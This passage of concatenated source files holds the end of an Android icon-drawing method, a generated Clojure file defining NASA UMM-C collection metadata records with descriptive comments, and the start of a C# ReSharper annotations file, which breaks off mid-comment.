				icon = new BitmapDrawable(Resources.getSystem(), thumb);
				canvas.setBitmap(null);
			}
			// Exact-fit icons fall through and are returned unchanged.
		}

		return icon;
	}
}
{ "pile_set_name": "Github" }
;; WARNING: This file was generated from umm-c-json-schema.json. Do not manually modify. (ns cmr.umm-spec.models.umm-collection-models "Defines UMM-C clojure records." (:require [cmr.common.dev.record-pretty-printer :as record-pretty-printer])) (defrecord UMM-C [ ;; Information required to properly cite the collection in professional scientific literature. ;; This element provides information for constructing a citation for the item itself, and is not ;; designed for listing bibliographic references of scientific research articles arising from ;; search results. A list of references related to the research results should be in the ;; Publication Reference element. CollectionCitations ;; Controlled hierarchical keywords used to specify the spatial location of the collection. The ;; controlled vocabulary for spatial keywords is maintained in the Keyword Management System ;; (KMS). The Spatial Keyword hierarchy includes one or more of the following layers: Category ;; (e.g., Continent), Type (e.g. Africa), Subregion1 (e.g., Central Africa), Subregion2 (e.g., ;; Cameroon), and Subregion3. DetailedLocation exists outside the hierarchy. LocationKeywords ;; Dates related to activities involving the metadata record itself. For example, Future Review ;; date is the date that the metadata record is scheduled to be reviewed. MetadataDates ;; The Version Description of the collection. VersionDescription ;; This is deprecated and will be removed. Use LocationKeywords instead. Controlled hierarchical ;; keywords used to specify the spatial location of the collection. The controlled vocabulary for ;; spatial keywords is maintained in the Keyword Management System (KMS). The Spatial Keyword ;; hierarchy includes one or more of the following layers: Location_Category (e.g., Continent), ;; Location_Type (e.g. Africa), Location_Subregion1 (e.g., Central Africa), Location_Subregion2 ;; (e.g., Cameroon), and Location_Subregion3. 
SpatialKeywords ;; Identifies the topic categories from the EN ISO 19115-1:2014 Geographic Information – Metadata ;; – Part 1: Fundamentals (http://www.isotc211.org/) Topic Category Code List that pertain to ;; this collection, based on the Science Keywords associated with the collection. An ISO Topic ;; Category is a high-level thematic classification to assist in the grouping of and search for ;; available collections. ISOTopicCategories ;; The short name associated with the collection. ShortName ;; A brief description of the collection or service the metadata represents. Abstract ;; The language used in the metadata record. MetadataLanguage ;; Formerly called Internal Directory Name (IDN) Node (IDN_Node). This element has been used ;; historically by the GCMD internally to identify association, responsibility and/or ownership ;; of the dataset, service or supplemental information. Note: This field only occurs in the DIF. ;; When a DIF record is retrieved in the ECHO10 or ISO 19115 formats, this element will not be ;; translated. DirectoryNames ;; Suggested usage or purpose for the collection data or service. Purpose ;; Name of the two-dimensional tiling system for the collection. Previously called ;; TwoDCoordinateSystem. TilingIdentificationSystems ;; Describes key bibliographic citations pertaining to the collection. PublicationReferences ;; This element stores the DOI (Digital Object Identifier) that identifies the collection. Note: ;; The values should start with the directory indicator which in ESDIS' case is 10. If the DOI ;; was registered through ESDIS, the beginning of the string should be 10.5067. The DOI URL is ;; not stored here; it should be stored as a RelatedURL. The DOI organization that is responsible ;; for creating the DOI is described in the Authority element. For ESDIS records the value of ;; https://doi.org/ should be used. 
While this element is not required, NASA metadata providers ;; are strongly encouraged to include DOI and DOI Authority for their collections. DOI ;; This element describes any data/service related URLs that include project home pages, ;; services, related data archives/servers, metadata extensions, direct links to online software ;; packages, web mapping services, links to images, or other data. RelatedUrls ;; Dates related to activities involving the collection data. For example, Creation date is the ;; date that the collection data first entered the data archive system. DataDates ;; Information about the personnel responsible for this collection and its metadata. ContactPersons ;; Allows the author to constrain access to the collection. This includes any special ;; restrictions, legal prerequisites, limitations and/or warnings on obtaining collection data. ;; Some words that may be used in this element's value include: Public, In-house, Limited, None. ;; The value field is used for special ACL rules (Access Control Lists ;; (http://en.wikipedia.org/wiki/Access_control_list)). For example it can be used to hide ;; metadata when it isn't ready for public consumption. AccessConstraints SpatialExtent ;; Information about the personnel groups responsible for this collection and its metadata. ContactGroups ;; The data’s distinctive attributes of the collection (i.e. attributes used to describe the ;; unique characteristics of the collection which extend beyond those defined). AdditionalAttributes ;; This element and all of its sub elements exist for display purposes. It allows a data provider ;; to provide archive and distribution information up front to an end user, to help them decide ;; if they can use the product. ArchiveAndDistributionInformation ;; Controlled Science Keywords describing the collection. The controlled vocabulary for Science ;; Keywords is maintained in the Keyword Management System (KMS). 
ScienceKeywords ;; Free text description of the quality of the collection data. Description may include: 1) ;; succinct description of the quality of data in the collection; 2) Any quality assurance ;; procedures followed in producing the data in the collection; 3) indicators of collection ;; quality or quality flags - both validated or invalidated; 4) recognized or potential problems ;; with quality; 5) established quality control mechanisms; and 6) established quantitative ;; quality measurements. Quality ;; The title of the collection or service described by the metadata. EntryTitle ;; This element describes the production status of the data set. There are five choices for Data ;; Providers: PLANNED refers to data sets to be collected in the future and are thus unavailable ;; at the present time. For Example: The Hydro spacecraft has not been launched, but information ;; on planned data sets may be available. ACTIVE refers to data sets currently in production or ;; data that is continuously being collected or updated. For Example: data from the AIRS ;; instrument on Aqua is being collected continuously. COMPLETE refers to data sets in which no ;; updates or further data collection will be made. For Example: Nimbus-7 SMMR data collection ;; has been completed. DEPRECATED refers to data sets that have been retired, but still can be ;; retrieved. Usually newer products exist that replace the retired data set. NOT APPLICABLE ;; refers to data sets in which a collection progress is not applicable such as a calibration ;; collection. There is a sixth value of NOT PROVIDED that should not be used by a data provider. ;; It is currently being used as a value when a correct translation cannot be done with the ;; current valid values, or when the value is not provided by the data provider. CollectionProgress ;; For paleoclimate or geologic data, PaleoTemporalCoverage is the length of time represented by ;; the data collected. 
PaleoTemporalCoverage should be used when the data spans time frames ;; earlier than yyyy-mm-dd = 0001-01-01. PaleoTemporalCoverages ;; The reference frame or system in which altitudes (elevations) are given. The information ;; contains the datum name, distance units and encoding method, which provide the definition for ;; the system. This field also stores the characteristics of the reference frame or system from ;; which depths are measured. The additional information in the field is geometry reference data ;; etc. SpatialInformation ;; Identifies the collection as a Science Quality collection or a non-science-quality collection ;; such as a Near-Real-Time collection. CollectionDataType ;; Designed to protect privacy and/or intellectual property by allowing the author to specify how ;; the collection may or may not be used after access is granted. This includes any special ;; restrictions, legal prerequisites, terms and conditions, and/or limitations on using the item. ;; Providers may request acknowledgement of the item from users and claim no responsibility for ;; quality and completeness. Note: Use Constraints describe how the item may be used once access ;; has been granted; and is distinct from Access Constraints, which refers to any constraints in ;; accessing the item. UseConstraints ;; One or more words or phrases that describe the temporal resolution of the dataset. TemporalKeywords ;; Allows authors to provide words or phrases outside of the controlled Science Keyword ;; vocabulary, to further describe the collection. AncillaryKeywords ;; The identifier for the processing level of the collection (e.g., Level0, Level1A). ProcessingLevel ;; Information about the relevant platform(s) used to acquire the data in the collection. ;; Platform types are controlled in the Keyword Management System (KMS), and include Spacecraft, ;; Aircraft, Vessel, Buoy, Platform, Station, Network, Human, etc. 
Platforms ;; The name of the scientific program, field campaign, or project from which the data were ;; collected. This element is intended for the non-space assets such as aircraft, ground systems, ;; balloons, sondes, ships, etc. associated with campaigns. This element may also cover a long ;; term project that continuously creates new data sets — like MEaSUREs from ISCCP and NVAP or ;; CMARES from MISR. Project also includes the Campaign sub-element to support multiple campaigns ;; under the same project. Projects ;; The Version of the collection. Version ;; This class contains attributes which describe the temporal range of a specific collection. ;; Temporal Extent includes a specification of the Temporal Range Type of the collection, which ;; is one of Range Date Time, Single Date Time, or Periodic Date Time TemporalExtents ;; Information about the data centers responsible for this collection and its metadata. DataCenters ;; This element is used to identify other services, collections, visualizations, granules, and ;; other metadata types and resources that are associated with or dependent on the data described ;; by the metadata. This element is also used to identify a parent metadata record if it exists. ;; This usage should be reserved for instances where a group of metadata records are subsets that ;; can be better represented by one parent metadata record, which describes the entire set. In ;; some instances, a child may point to more than one parent. The EntryId is the same as the ;; element described elsewhere in this document where it contains and ID, and Version. MetadataAssociations ;; Describes the language used in the preparation, storage, and description of the collection. It ;; is the language of the collection data themselves. It does not refer to the language used in ;; the metadata record (although this may be the same language). 
DataLanguage ]) (record-pretty-printer/enable-record-pretty-printing UMM-C) ;; For paleoclimate or geologic data, PaleoTemporalCoverage is the length of time represented by the ;; data collected. PaleoTemporalCoverage should be used when the data spans time frames earlier than ;; yyyy-mm-dd = 0001-01-01. (defrecord PaleoTemporalCoverageType [ ;; Hierarchy of terms indicating units of geologic time, i.e., eon (e.g, Phanerozoic), era (e.g., ;; Cenozoic), period (e.g., Paleogene), epoch (e.g., Oligocene), and stage or age (e.g, ;; Chattian). ChronostratigraphicUnits ;; A string indicating the number of years furthest back in time, including units, e.g., 100 Ga. ;; Units may be Ga (billions of years before present), Ma (millions of years before present), ka ;; (thousands of years before present) or ybp (years before present). StartDate ;; A string indicating the number of years closest to the present time, including units, e.g., 10 ;; ka. Units may be Ga (billions of years before present), Ma (millions of years before present), ;; ka (thousands of years before present) or ybp (years before present). EndDate ]) (record-pretty-printer/enable-record-pretty-printing PaleoTemporalCoverageType) ;; This sub-element either contains a license summary or free-text description that details the ;; permitted use or limitation of this collection. (defrecord UseConstraintsDescriptionType [ ;; This sub-element either contains a license summary or free-text description that details the ;; permitted use or limitation of this collection. Description ]) (record-pretty-printer/enable-record-pretty-printing UseConstraintsDescriptionType) ;; Information about a collection with horizontal spatial coverage. (defrecord HorizontalSpatialDomainType [ ;; The appropriate numeric or alpha code used to identify the various zones in the collection's ;; grid coordinate system. ZoneIdentifier Geometry ;; Specifies the horizontal spatial extents coordinate system and its resolution. 
ResolutionAndCoordinateSystem ]) (record-pretty-printer/enable-record-pretty-printing HorizontalSpatialDomainType) ;; Contains the excluded boundaries from the GPolygon. (defrecord ExclusiveZoneType [ Boundaries ]) (record-pretty-printer/enable-record-pretty-printing ExclusiveZoneType) ;; Information about a two-dimensional tiling system related to this collection. (defrecord TilingIdentificationSystemType [ TilingIdentificationSystemName Coordinate1 Coordinate2 ]) (record-pretty-printer/enable-record-pretty-printing TilingIdentificationSystemType) ;; Specifies the geographic and vertical (altitude, depth) coverage of the data. (defrecord SpatialExtentType [ ;; Denotes whether the collection's spatial coverage requires horizontal, vertical, horizontal ;; and vertical, orbit, or vertical and orbit in the spatial domain and coordinate system ;; definitions. SpatialCoverageType HorizontalSpatialDomain VerticalSpatialDomains OrbitParameters GranuleSpatialRepresentation ]) (record-pretty-printer/enable-record-pretty-printing SpatialExtentType) ;; This element defines a mapping to the GCMD KMS hierarchical location list. It replaces ;; SpatialKeywords. Each tier must have data in the tier above it. (defrecord LocationKeywordType [ ;; Top-level controlled keyword hierarchical level that contains the largest general location ;; where the collection data was taken from. 
Category ;; Second-tier controlled keyword hierarchical level that contains the regional location where ;; the collection data was taken from Type ;; Third-tier controlled keyword heirarchical level that contains the regional sub-location where ;; the collection data was taken from Subregion1 ;; Fourth-tier controlled keyword heirarchical level that contains the regional sub-location ;; where the collection data was taken from Subregion2 ;; Fifth-tier controlled keyword heirarchical level that contains the regional sub-location where ;; the collection data was taken from Subregion3 ;; Uncontrolled keyword heirarchical level that contains the specific location where the ;; collection data was taken from. Exists outside the heirarchy. DetailedLocation ]) (record-pretty-printer/enable-record-pretty-printing LocationKeywordType) (defrecord LocalCoordinateSystemType [ ;; The information provided to register the local system to the Earth (e.g. control points, ;; satellite ephemeral data, and inertial navigation data). GeoReferenceInformation ;; A description of the Local Coordinate System and geo-reference information. Description ]) (record-pretty-printer/enable-record-pretty-printing LocalCoordinateSystemType) ;; This element defines a single artifact that is distributed by the data provider. This element ;; only includes the distributable artifacts that can be obtained by the user without the user ;; having to invoke a service. These should be documented in the UMM-S specification. (defrecord FileDistributionInformationType [ ;; Allows the provider to state whether the distributable item's format is its native format or ;; another supported format. FormatType ;; An approximate average size of the distributable item. This gives an end user an idea of the ;; magnitude for each distributable file if more than 1 exists. AverageFileSize ;; Conveys the price one has to pay to obtain the distributable item. 
Fees ;; This element defines a single format for a distributable artifact. Examples of format include: ;; ascii, binary, GRIB, BUFR, HDF4, HDF5, HDF-EOS4, HDF-EOS5, jpeg, png, tiff, geotiff, kml. Format ;; An approximate total size of all of the distributable items within a collection. This gives an ;; end user an idea of the magnitude for all of distributable files combined. TotalCollectionFileSize ;; The date of which this collection started to collect data. This date is used by users to be ;; able to calculate the current total collection file size. The date needs to be in the ;; yyyy-MM-ddTHH:mm:ssZ format; for example: 2018-01-01T10:00:00Z. TotalCollectionFileSizeBeginDate ;; Allows the record provider to provide supporting documentation about the Format. FormatDescription ;; Unit of measure for the total collection file size. TotalCollectionFileSizeUnit ;; Provides the data provider a way to convey more information about the distributable item. Description ;; Unit of measure for the average file size. AverageFileSizeUnit ;; This element defines the media by which the end user can obtain the distributable item. Each ;; media type is listed separately. Examples of media include: CD-ROM, 9 track tape, diskettes, ;; hard drives, online, transparencies, hardcopy, etc. Media ]) (record-pretty-printer/enable-record-pretty-printing FileDistributionInformationType) ;; This class defines the horizontal spatial extents coordinate system and the data product's ;; horizontal data resolution. The horizontal data resolution is defined as the smallest horizontal ;; distance between successive elements of data in a dataset. This is synonymous with terms such as ;; ground sample distance, sample spacing and pixel size. It is to be noted that the horizontal data ;; resolution could be different in the two horizontal dimensions. 
Also, it is different from the ;; spatial resolution of an instrument, which is the minimum distance between points that an ;; instrument can see as distinct. (defrecord ResolutionAndCoordinateSystemType [ ;; This element holds a description about the resoultion and coordinate system for people to ;; read. Description ;; This element describes the geodetic model for the data product. GeodeticModel ;; This class defines a number of the data products horizontal data resolution. The horizontal ;; data resolution is defined as the smallest horizontal distance between successive elements of ;; data in a dataset. This is synonymous with terms such as ground sample distance, sample ;; spacing and pixel size. It is to be noted that the horizontal data resolution could be ;; different in the two horizontal dimensions. Also, it is different from the spatial resolution ;; of an instrument, which is the minimum distance between points that an instrument can see as ;; distinct. HorizontalDataResolution ;; This element describes the local coordinate system for the data product. LocalCoordinateSystem ]) (record-pretty-printer/enable-record-pretty-printing ResolutionAndCoordinateSystemType) ;; Generic Resolutions object describes general resolution data for a data product where it is not ;; known if a data product is gridded or not. (defrecord HorizontalDataGenericResolutionType [ ;; The minimum difference between two adjacent values on a horizontal plane in the X axis. In ;; most cases this is along the longitudinal axis. XDimension ;; The minimum difference between two adjacent values on a horizontal plan in the Y axis. In most ;; cases this is along the latitudinal axis. YDimension ;; Units of measure used for the XDimension and YDimension values. 
Unit ]) (record-pretty-printer/enable-record-pretty-printing HorizontalDataGenericResolutionType) (defrecord BoundingRectangleType [ WestBoundingCoordinate NorthBoundingCoordinate EastBoundingCoordinate SouthBoundingCoordinate ]) (record-pretty-printer/enable-record-pretty-printing BoundingRectangleType) (defrecord LineType [ Points ]) (record-pretty-printer/enable-record-pretty-printing LineType) ;; This class defines a number of the data products horizontal data resolution. The horizontal data ;; resolution is defined as the smallest horizontal distance between successive elements of data in ;; a dataset. This is synonymous with terms such as ground sample distance, sample spacing and pixel ;; size. It is to be noted that the horizontal data resolution could be different in the two ;; horizontal dimensions. Also, it is different from the spatial resolution of an instrument, which ;; is the minimum distance between points that an instrument can see as distinct. (defrecord HorizontalDataResolutionType [ ;; Varies Resolution object describes a data product that has a number of resolution values. VariesResolution ;; Point Resolution object describes a data product that is from a point source. PointResolution ;; Non Gridded Resolutions object describes resolution data for non gridded data products. NonGriddedResolutions ;; Non Gridded Range Resolutions object describes range resolution data for non gridded data ;; products. NonGriddedRangeResolutions ;; Gridded Resolutions object describes resolution data for gridded data products. GriddedResolutions ;; Gridded Range Resolutions object describes range resolution data for gridded data products. GriddedRangeResolutions ;; Generic Resolutions object describes general resolution data for a data product where it is ;; not known if a data product is gridded or not. 
GenericResolutions ]) (record-pretty-printer/enable-record-pretty-printing HorizontalDataResolutionType) (defrecord ChronostratigraphicUnitType [ Eon Era Epoch Stage DetailedClassification Period ]) (record-pretty-printer/enable-record-pretty-printing ChronostratigraphicUnitType) (defrecord VerticalSpatialDomainType [ ;; Describes the type of the area of vertical space covered by the collection locality. Type ;; Describes the extent of the area of vertical space covered by the collection. Must be ;; accompanied by an Altitude Encoding Method description. The datatype for this attribute is the ;; value of the attribute VerticalSpatialDomainType. The unit for this attribute is the value of ;; either DepthDistanceUnits or AltitudeDistanceUnits. Value ]) (record-pretty-printer/enable-record-pretty-printing VerticalSpatialDomainType) (defrecord GeometryType [ CoordinateSystem Points BoundingRectangles GPolygons Lines ]) (record-pretty-printer/enable-record-pretty-printing GeometryType) ;; The reference frame or system from which altitude is measured. The term 'altitude' is used ;; instead of the common term 'elevation' to conform to the terminology in Federal Information ;; Processing Standards 70-1 and 173. The information contains the datum name, distance units and ;; encoding method, which provide the definition for the system. (defrecord AltitudeSystemDefinitionType [ ;; The identification given to the level surface taken as the surface of reference from which ;; measurements are compared. DatumName ;; The units in which measurements are recorded. DistanceUnits ;; The minimum distance possible between two adjacent values, expressed in distance units of ;; measure for the collection. Resolutions ]) (record-pretty-printer/enable-record-pretty-printing AltitudeSystemDefinitionType) ;; The longitude and latitude values of a spatially referenced point in degrees. 
(defrecord PointType [ Longitude Latitude ]) (record-pretty-printer/enable-record-pretty-printing PointType) ;; This element contains the Processing Level Id and the Processing Level Description (defrecord ProcessingLevelType [ ;; Description of the meaning of the Processing Level Id, e.g., the Description for the Level4 ;; Processing Level Id might be 'Model output or results from analyses of lower level data' ProcessingLevelDescription ;; An identifier indicating the level at which the data in the collection are processed, ranging ;; from Level0 (raw instrument data at full resolution) to Level4 (model output or analysis ;; results). The value of Processing Level Id is chosen from a controlled vocabulary. Id ]) (record-pretty-printer/enable-record-pretty-printing ProcessingLevelType) ;; Defines the minimum and maximum value for one dimension of a two dimensional coordinate system. (defrecord TilingCoordinateType [ MinimumValue MaximumValue ]) (record-pretty-printer/enable-record-pretty-printing TilingCoordinateType) (defrecord GPolygonType [ Boundary ExclusiveZone ]) (record-pretty-printer/enable-record-pretty-printing GPolygonType) ;; A boundary is set of points connected by straight lines representing a polygon on the earth. It ;; takes a minimum of three points to make a boundary. Points must be specified in counter-clockwise ;; order and closed (the first and last vertices are the same). (defrecord BoundaryType [ Points ]) (record-pretty-printer/enable-record-pretty-printing BoundaryType) ;; This element describes the geodetic model for the data product. (defrecord GeodeticModelType [ ;; The identification given to the reference system used for defining the coordinates of points. HorizontalDatumName ;; Identification given to established representation of the Earth's shape. EllipsoidName ;; Radius of the equatorial axis of the ellipsoid. SemiMajorAxis ;; The ratio of the Earth's major axis to the difference between the major and the minor. 
DenominatorOfFlatteningRatio ]) (record-pretty-printer/enable-record-pretty-printing GeodeticModelType) ;; The reference frame or system from which depth is measured. The information contains the datum ;; name, distance units and encoding method, which provide the definition for the system. (defrecord DepthSystemDefinitionType [ ;; The identification given to the level surface taken as the surface of reference from which ;; measurements are compared. DatumName ;; The units in which measurements are recorded. DistanceUnits ;; The minimum distance possible between two adjacent values, expressed in distance units of ;; measure for the collection. Resolutions ]) (record-pretty-printer/enable-record-pretty-printing DepthSystemDefinitionType) ;; This entity stores the reference frame or system from which horizontal and vertical spatial ;; domains are measured. The horizontal reference frame includes a Geodetic Model, Geographic ;; Coordinates, and Local Coordinates. The Vertical reference frame includes altitudes (elevations) ;; and depths. (defrecord SpatialInformationType [ VerticalCoordinateSystem ;; Denotes whether the spatial coverage of the collection is horizontal, vertical, horizontal and ;; vertical, orbit, or vertical and orbit. SpatialCoverageType ]) (record-pretty-printer/enable-record-pretty-printing SpatialInformationType) ;; Non Gridded Range Resolutions object describes range resolution data for non gridded data ;; products. (defrecord HorizontalDataResolutionNonGriddedRangeType [ ;; The minimum, minimum difference between two adjacent values on a horizontal plane in the X ;; axis. In most cases this is along the longitudinal axis. MinimumXDimension ;; The minimum, minimum difference between two adjacent values on a horizontal plan in the Y ;; axis. In most cases this is along the latitudinal axis. MinimumYDimension ;; The maximum, minimum difference between two adjacent values on a horizontal plane in the X ;; axis. 
In most cases this is along the longitudinal axis. MaximumXDimension ;; The maximum, minimum difference between two adjacent values on a horizontal plan in the Y ;; axis. In most cases this is along the latitudinal axis. MaximumYDimension ;; Units of measure used for the XDimension and YDimension values. Unit ;; This element describes the angle of the measurement with respect to the instrument that gives ;; an understanding of the specified resolution. ViewingAngleType ;; This element describes the instrument scanning direction. ScanDirection ]) (record-pretty-printer/enable-record-pretty-printing HorizontalDataResolutionNonGriddedRangeType) ;; This element defines a single archive artifact which a data provider would like to inform an end ;; user that it exists. (defrecord FileArchiveInformationType [ ;; Allows the provider to state whether the archivable item's format is its native format or ;; another supported format. FormatType ;; An approximate average size of the archivable item. This gives an end user an idea of the ;; magnitude for each archivable file if more than 1 exists. AverageFileSize ;; This element defines a single format for an archival artifact. Examples of format include: ;; ascii, binary, GRIB, BUFR, HDF4, HDF5, HDF-EOS4, HDF-EOS5, jpeg, png, tiff, geotiff, kml. Format ;; An approximate total size of all of the archivable items within a collection. This gives an ;; end user an idea of the magnitude for all of archivable files combined. TotalCollectionFileSize ;; The date of which this collection started to collect data. This date is used by users to be ;; able to calculate the current total collection file size. The date needs to be in the ;; yyyy-MM-ddTHH:mm:ssZ format; for example: 2018-01-01T10:00:00Z. TotalCollectionFileSizeBeginDate ;; Allows the record provider to provide supporting documentation about the Format. FormatDescription ;; Unit of measure for the total collection file size. 
TotalCollectionFileSizeUnit ;; Provides the data provider a way to convey more information about the archivable item. Description ;; Unit of measure for the average file size. AverageFileSizeUnit ]) (record-pretty-printer/enable-record-pretty-printing FileArchiveInformationType) ;; Orbit parameters for the collection used by the Orbital Backtrack Algorithm. (defrecord OrbitParametersType [ ;; Width of the swath at the equator in Kilometers. SwathWidth ;; Orbital period in decimal minutes. Period ;; Inclination of the orbit. This is the same as (180-declination) and also the same as the ;; highest latitude achieved by the satellite. Data Unit: Degree. InclinationAngle ;; Indicates the number of orbits. NumberOfOrbits ;; The latitude start of the orbit relative to the equator. This is used by the backtrack search ;; algorithm to treat the orbit as if it starts from the specified latitude. This is optional and ;; will default to 0 if not specified. StartCircularLatitude ]) (record-pretty-printer/enable-record-pretty-printing OrbitParametersType) ;; Gridded Range Resolutions object describes range resolution data for gridded data products. (defrecord HorizontalDataResolutionGriddedRangeType [ ;; The minimum, minimum difference between two adjacent values on a horizontal plane in the X ;; axis. In most cases this is along the longitudinal axis. MinimumXDimension ;; The minimum, minimum difference between two adjacent values on a horizontal plan in the Y ;; axis. In most cases this is along the latitudinal axis. MinimumYDimension ;; The maximum, minimum difference between two adjacent values on a horizontal plane in the X ;; axis. In most cases this is along the longitudinal axis. MaximumXDimension ;; The maximum, minimum difference between two adjacent values on a horizontal plan in the Y ;; axis. In most cases this is along the latitudinal axis. MaximumYDimension ;; Units of measure used for the XDimension and YDimension values. 
Unit ]) (record-pretty-printer/enable-record-pretty-printing HorizontalDataResolutionGriddedRangeType) ;; This element and all of its sub elements exist for display purposes. It allows a data provider to ;; provide archive and distribution information up front to an end user, to help them decide if they ;; can use the product. (defrecord ArchiveAndDistributionInformationType [ ;; This element defines a single archive artifact which a data provider would like to inform an ;; end user that it exists. FileArchiveInformation ;; This element defines a single artifact that is distributed by the data provider. This element ;; only includes the distributable artifacts that can be obtained by the user without the user ;; having to invoke a service. These should be documented in the UMM-S specification. FileDistributionInformation ]) (record-pretty-printer/enable-record-pretty-printing ArchiveAndDistributionInformationType) ;; Formerly called Internal Directory Name (IDN) Node (IDN_Node). This element has been used ;; historically by the GCMD internally to identify association, responsibility and/or ownership of ;; the dataset, service or supplemental information. Note: This field only occurs in the DIF. When a ;; DIF record is retrieved in the ECHO10 or ISO 19115 formats, this element will not be translated. (defrecord DirectoryNameType [ ShortName LongName ]) (record-pretty-printer/enable-record-pretty-printing DirectoryNameType) ;; Non Gridded Resolutions object describes resolution data for non gridded data products. (defrecord HorizontalDataResolutionNonGriddedType [ ;; The minimum difference between two adjacent values on a horizontal plane in the X axis. In ;; most cases this is along the longitudinal axis. XDimension ;; The minimum difference between two adjacent values on a horizontal plan in the Y axis. In most ;; cases this is along the latitudinal axis. YDimension ;; Units of measure used for the XDimension and YDimension values. 
Unit ;; This element describes the angle of the measurement with respect to the instrument that gives ;; an understanding of the specified resolution. ViewingAngleType ;; This element describes the instrument scanning direction. ScanDirection ]) (record-pretty-printer/enable-record-pretty-printing HorizontalDataResolutionNonGriddedType) ;; This element defines how the data may or may not be used after access is granted to assure the ;; protection of privacy or intellectual property. This includes license text, license URL, or any ;; special restrictions, legal prerequisites, terms and conditions, and/or limitations on using the ;; data set. Data providers may request acknowledgement of the data from users and claim no ;; responsibility for quality and completeness of data. (defrecord UseConstraintsType [ Description ;; This element holds the URL and associated information to access the License on the web. If ;; this element is used the LicenseText element cannot be used. LicenseUrl ;; This element holds the actual license text. If this element is used the LicenseUrl element ;; cannot be used. LicenseText ]) (record-pretty-printer/enable-record-pretty-printing UseConstraintsType) (defrecord VerticalCoordinateSystemType [ AltitudeSystemDefinition DepthSystemDefinition ]) (record-pretty-printer/enable-record-pretty-printing VerticalCoordinateSystemType) ;; Gridded Resolutions object describes resolution data for gridded data products. (defrecord HorizontalDataResolutionGriddedType [ ;; The minimum difference between two adjacent values on a horizontal plane in the X axis. In ;; most cases this is along the longitudinal axis. XDimension ;; The minimum difference between two adjacent values on a horizontal plan in the Y axis. In most ;; cases this is along the latitudinal axis. YDimension ;; Units of measure used for the XDimension and YDimension values. Unit ]) (record-pretty-printer/enable-record-pretty-printing HorizontalDataResolutionGriddedType)
{ "pile_set_name": "Github" }
 #pragma warning disable 1591 // ReSharper disable UnusedMember.Global // ReSharper disable UnusedParameter.Local // ReSharper disable MemberCanBePrivate.Global // ReSharper disable UnusedAutoPropertyAccessor.Global // ReSharper disable IntroduceOptionalParameters.Global // ReSharper disable MemberCanBeProtected.Global // ReSharper disable InconsistentNaming namespace IPFilter.UI.Annotations { using System; /// <summary> /// Indicates that the value of the marked element could be <c>null</c> sometimes, /// so the check for <c>null</c> is necessary before its usage /// </summary> /// <example><code> /// [CanBeNull] public object Test() { return null; } /// public void UseTest() { /// var p = Test(); /// var s = p.ToString(); // Warning: Possible 'System.NullReferenceException' /// } /// </code></example> [AttributeUsage( AttributeTargets.Method | AttributeTargets.Parameter | AttributeTargets.Property | AttributeTargets.Delegate | AttributeTargets.Field, AllowMultiple = false, Inherited = true)] public sealed class CanBeNullAttribute : Attribute { } /// <summary> /// Indicates that the value of the marked element could never be <c>null</c> /// </summary> /// <example><code> /// [NotNull] public object Foo() { /// return null; // Warning: Possible 'null' assignment /// } /// </code></example> [AttributeUsage( AttributeTargets.Method | AttributeTargets.Parameter | AttributeTargets.Property | AttributeTargets.Delegate | AttributeTargets.Field, AllowMultiple = false, Inherited = true)] public sealed class NotNullAttribute : Attribute { } /// <summary> /// Indicates that the marked method builds string by format pattern and (optional) arguments. /// Parameter, which contains format string, should be given in constructor. 
The format string /// should be in <see cref="string.Format(IFormatProvider,string,object[])"/>-like form /// </summary> /// <example><code> /// [StringFormatMethod("message")] /// public void ShowError(string message, params object[] args) { /* do something */ } /// public void Foo() { /// ShowError("Failed: {0}"); // Warning: Non-existing argument in format string /// } /// </code></example> [AttributeUsage( AttributeTargets.Constructor | AttributeTargets.Method, AllowMultiple = false, Inherited = true)] public sealed class StringFormatMethodAttribute : Attribute { /// <param name="formatParameterName"> /// Specifies which parameter of an annotated method should be treated as format-string /// </param> public StringFormatMethodAttribute(string formatParameterName) { FormatParameterName = formatParameterName; } public string FormatParameterName { get; private set; } } /// <summary> /// Indicates that the function argument should be string literal and match one /// of the parameters of the caller function. 
For example, ReSharper annotates /// the parameter of <see cref="System.ArgumentNullException"/> /// </summary> /// <example><code> /// public void Foo(string param) { /// if (param == null) /// throw new ArgumentNullException("par"); // Warning: Cannot resolve symbol /// } /// </code></example> [AttributeUsage(AttributeTargets.Parameter, AllowMultiple = false, Inherited = true)] public sealed class InvokerParameterNameAttribute : Attribute { } /// <summary> /// Indicates that the method is contained in a type that implements /// <see cref="System.ComponentModel.INotifyPropertyChanged"/> interface /// and this method is used to notify that some property value changed /// </summary> /// <remarks> /// The method should be non-static and conform to one of the supported signatures: /// <list> /// <item><c>NotifyChanged(string)</c></item> /// <item><c>NotifyChanged(params string[])</c></item> /// <item><c>NotifyChanged{T}(Expression{Func{T}})</c></item> /// <item><c>NotifyChanged{T,U}(Expression{Func{T,U}})</c></item> /// <item><c>SetProperty{T}(ref T, T, string)</c></item> /// </list> /// </remarks> /// <example><code> /// public class Foo : INotifyPropertyChanged { /// public event PropertyChangedEventHandler PropertyChanged; /// [NotifyPropertyChangedInvocator] /// protected virtual void NotifyChanged(string propertyName) { ... 
} /// /// private string _name; /// public string Name { /// get { return _name; } /// set { _name = value; NotifyChanged("LastName"); /* Warning */ } /// } /// } /// </code> /// Examples of generated notifications: /// <list> /// <item><c>NotifyChanged("Property")</c></item> /// <item><c>NotifyChanged(() =&gt; Property)</c></item> /// <item><c>NotifyChanged((VM x) =&gt; x.Property)</c></item> /// <item><c>SetProperty(ref myField, value, "Property")</c></item> /// </list> /// </example> [AttributeUsage(AttributeTargets.Method, AllowMultiple = false, Inherited = true)] public sealed class NotifyPropertyChangedInvocatorAttribute : Attribute { public NotifyPropertyChangedInvocatorAttribute() { } public NotifyPropertyChangedInvocatorAttribute(string parameterName) { ParameterName = parameterName; } public string ParameterName { get; private set; } } /// <summary> /// Describes dependency between method input and output /// </summary> /// <syntax> /// <p>Function Definition Table syntax:</p> /// <list> /// <item>FDT ::= FDTRow [;FDTRow]*</item> /// <item>FDTRow ::= Input =&gt; Output | Output &lt;= Input</item> /// <item>Input ::= ParameterName: Value [, Input]*</item> /// <item>Output ::= [ParameterName: Value]* {halt|stop|void|nothing|Value}</item> /// <item>Value ::= true | false | null | notnull | canbenull</item> /// </list> /// If method has single input parameter, it's name could be omitted.<br/> /// Using <c>halt</c> (or <c>void</c>/<c>nothing</c>, which is the same) /// for method output means that the methos doesn't return normally.<br/> /// <c>canbenull</c> annotation is only applicable for output parameters.<br/> /// You can use multiple <c>[ContractAnnotation]</c> for each FDT row, /// or use single attribute with rows separated by semicolon.<br/> /// </syntax> /// <examples><list> /// <item><code> /// [ContractAnnotation("=> halt")] /// public void TerminationMethod() /// </code></item> /// <item><code> /// 